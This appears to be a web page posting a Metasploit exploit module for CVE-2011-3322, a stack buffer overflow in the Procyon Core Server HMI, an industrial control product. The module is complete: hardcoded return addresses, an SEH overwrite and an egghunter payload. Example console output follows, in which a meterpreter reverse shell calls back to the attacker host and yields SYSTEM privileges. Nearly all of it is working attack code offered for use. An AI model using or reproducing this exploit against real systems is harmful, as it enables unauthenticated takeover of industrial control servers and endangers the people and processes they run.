read, write, eXecute…

Procyon Core Server HMI ⇐ v1.13 Coreservice.exe stack buffer overflow vulnerability download
##
# $Id: procyon_core_server.rb 13950 2011-10-16 09:55:07Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::Egghunter
        include Msf::Exploit::Remote::Tcp

        def initialize(info={})
                super(update_info(info,
                        'Name'           => "Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow",
                        'Description'    => %q{
                                        This module exploits a vulnerability in the coreservice.exe component of Proycon
                                Core Server <= v1.13. While processing a password, the application
                                fails to do proper bounds checking before copying data into a small buffer on the stack.
                                This causes a buffer overflow and allows to overwrite a structured exception handling
                                record on the stack, allowing for unauthenticated remote code execution.  Also, after the
                                payload exits, Coreservice.exe should automatically recover.
                        },
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 13950 $',
                        'Author'         =>
                                [
                                        'Knud Højgaard <keh[at]nsense.dk>',        # Initial discovery
                                        'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf
                                ],
                        'References'     =>
                                [
                                        ['CVE', '2011-3322'],
                                        ['OSVDB', '75371'],
                                        ['URL', 'http://www.uscert.gov/control_systems/pdf/ICSA-11-216-01.pdf'],
                                        ['URL', 'http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow']
                                ],
                        'Payload'        =>
                                {
                                        'BadChars' => "\x00\x0a\x0d",
                                },
                        'DefaultOptions'  =>
                                {
                                        'ExitFunction' => 'process',
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [

                                        [
                                                'Windows XP SP3 - No dep bypass',
                                                {
                                                        'Ret'    => 0x774699bf, # JMP ESP [user32.dll]
                                                        'Edx'    => 0x1D847770, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]
                                                        'Eax'    => 0x01010106, # 0x7712dec2 -> 0x00700040 RW [oleaut32.dll]
                                                        'Offset' => 8
                                                }
                                        ],
                                ],
                        'Privileged'     => true,
                        'DisclosureDate' => "Sep 08 2011",
                        'DefaultTarget'  => 0))

                        register_options(
                        [
                                Opt::RPORT(23)
                        ], self.class)
        end

        def check
                connect
                res = sock.get_once.chomp  #This gives us string "----------------------------"
                res = sock.get_once.chomp  #This gives us the actual software version
                disconnect

                if res =~ /Core Command Interface V1\.(.*)2/
                        return Exploit::CheckCode::Vulnerable
                end
                return Exploit::CheckCode::Safe
        end

        def exploit

                eggoptions =
                {
                        :checksum => false,
                        :eggtag => 'ssec',
                }

                badchars = "\x00\x0a\x0d"
                hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

                sploit = rand_text_alpha_upper(45)
                sploit << [target['Edx']].pack('V')
                sploit << [0x41414141].pack('V')
                sploit << [target['Eax']].pack('V')
                sploit << rand_text_alpha_upper(target['Offset'])
                sploit << [target.ret].pack('V')
                sploit << make_nops(10)
                sploit << hunter
                sploit << rand_text_alpha_upper(500)
                sploit << egg
                sploit << "\r\n"

                connect
                sock.get_once()
                print_status("Sending request...")
                sock.put(sploit)
                handler()
                disconnect

        end

end
example usage
[mr_me@neptune procyon_vulns]$ msfconsole -r sploit.rc

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 720 exploits - 362 auxiliary - 58 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r13195 updated today (2011.07.16)

resource (sploit.rc)> use exploit/windows/scada/procyon_core_manager
resource (sploit.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (sploit.rc)> set LHOST 192.168.114.1
LHOST => 192.168.114.1
resource (sploit.rc)> set LPORT 4444
LPORT => 4444
resource (sploit.rc)> set RHOST 192.168.114.130
RHOST => 192.168.114.130
resource (sploit.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.114.1:4444
[*] Sending request...
[*] Sending stage (752128 bytes) to 192.168.114.130
[*] Meterpreter session 1 opened (192.168.114.1:4444 -> 192.168.114.130:1030) at 2011-07-17 05:59:10 +1000

msf exploit(procyon_core_manager) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3156 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>